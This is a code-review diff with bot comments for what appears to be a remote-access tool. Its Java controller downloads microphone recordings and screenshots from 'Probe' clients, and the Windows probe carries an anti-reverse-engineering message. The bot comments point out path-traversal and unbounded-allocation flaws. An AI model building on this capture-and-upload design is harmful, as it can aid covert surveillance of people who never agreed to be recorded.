MainWindow.HaltAllSystems(); - byte[] filebuf = new byte[fsize]; - Arrays.fill(filebuf, (byte)0); - do { - read= is.readNBytes(filebuf, 0, fsize); - fos.write(filebuf, 0, read); - if(read == Integer.parseInt(filesizeStr)) { - break; + if(MicRecorder.MicRec) + { + String fileinfo[] = response.split(":"); + String filename = fileinfo[1].strip(); + String filesizeStr = fileinfo[2].strip(); + int fsize = Integer.parseInt(filesizeStr); + if(filename.contains(".wav")) + { + 
MainWindow.Log( "Mic Recording '" + filename + "' of size '" + filesizeStr + "' bytes will be Downloaded."); + File downloaded_file = new File("downloads/"+filename); + downloaded_file.createNewFile(); + FileOutputStream fos = new FileOutputStream(downloaded_file, false); + BufferedOutputStream out = new BufferedOutputStream(fos); + + MainWindow.HaltAllSystems(); + byte[] filebuf = new byte[fsize]; + Arrays.fill(filebuf, (byte)0); + do { + read= is.readNBytes(filebuf, 0, fsize); + fos.write(filebuf, 0, read); + if(read == Integer.parseInt(filesizeStr)) { + break; + } + //System.out.println(read); + } while (read != 0); + + MainWindow.EnableAllSystems(); + fos.close(); + JOptionPane.showMessageDialog(null, "Mic Recording " + filename + " downloaded.\nBytes Expected : " + filesizeStr + " Bytes.\n" + + "Bytes Recevied : " + String.valueOf( new File("downloads/"+filename).length()) + " Bytes."); + MainWindow.Log("File " + filename + " downloaded."); + + out.flush(); + } else { + Server.SendData(sock, "kill"); + sock.close(); + clear(); + MainWindow.Log("Connection Closed for Client ID : " + Server.Clients.indexOf(sock)); + int mainIndex = Server.Clients.indexOf(sock); + String info = Server.UserPC.get(mainIndex); + JOptionPane.showMessageDialog(null, "Client ID : " + String.valueOf(mainIndex) + " " + info + " was kicked because it attempted to upload a file we did not Download. There may be a third party Impersonating as the Probe."); } - //System.out.println(read); - } while (read != 0); - - MainWindow.EnableAllSystems(); - fos.close(); - JOptionPane.showMessageDialog(null, "Mic Recording " + filename + " downloaded.\nBytes Expected : " + filesizeStr + " Bytes.\n" - + "Bytes Recevied : " + String.valueOf( new File(filename).length()) + " Bytes."); - MainWindow.Log("File " + filename + " downloaded."); + } - out.flush(); } diff --git a/probe/windows/Probe.h b/probe/windows/Probe.h index 506872b..decb39a 100644 --- a/probe/windows/Probe.h +++ b/probe/windows/Probe.h 
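Review bot: `filename.contains(".bmp")` and `filename.contains(".wav")` are substring tests, so a name that merely contains the extension passes. The SCREENSHOT branch still creates its temporary file with `new File(filename)` relative to the working directory, and the MIC branch concatenates the name into `"downloads/"+filename` with no containment check. Use `filename.endsWith(".bmp")` / `filename.endsWith(".wav")`, and resolve the target under a fixed directory, rejecting it unless the normalised path still starts with that directory. `Integer.parseInt(filesizeStr)` also feeds `new byte[fsize]` unbounded in both branches. SCREENSHOT has no request-state flag comparable to `MicRec`, and the MIC_OK kick dialog reuses the "attempted to upload a file" text although no file is involved in that reply.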
@@ -34,10 +34,9 @@ #define UNLEN 256 #define MESSAGE "Hey there! I see you are reverse engineering! :D" -/* -#define SERVER_HOST "192.168.1.106" -#define SERVER_PORT 1234 -*/ + +//#define SERVER_HOST "127.0.0.1 +//#define SERVER_PORT 1234 static BOOL connected = FALSE; diff --git a/probe/windows/ProbeCpp.cpp b/probe/windows/ProbeCpp.cpp index d976caa..08333e0 100644 --- a/probe/windows/ProbeCpp.cpp +++ b/probe/windows/ProbeCpp.cpp @@ -159,12 +159,12 @@ void ProbeConnect(void) InetPton(AF_INET, Host.c_str(), &server.sin_addr.s_addr); server.sin_port = htons(Portnum); server.sin_family = AF_INET; - - /* - server.sin_addr.s_addr = inet_addr(SERVER_HOST); - server.sin_port = htons(SERVER_PORT); - server.sin_family = AF_INET; - */ + + + //server.sin_addr.s_addr = inet_addr(SERVER_HOST); + //server.sin_port = htons(SERVER_PORT); + //server.sin_family = AF_INET; + do { if (connect(sockfd, (struct sockaddr*)&server, sizeof(server)) == SOCKET_ERROR) { REConnect();
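Review bot: The Probe.h and ProbeCpp.cpp hunks only convert a block comment into line comments, so the dead configuration code remains. The new `//#define SERVER_HOST "127.0.0.1` line has lost its closing quote and would not compile if it were ever uncommented. Since `Host` and `Portnum` are what `ProbeConnect` actually uses in the visible context, deleting the commented-out `SERVER_HOST` / `SERVER_PORT` lines in both files is cleaner than keeping them.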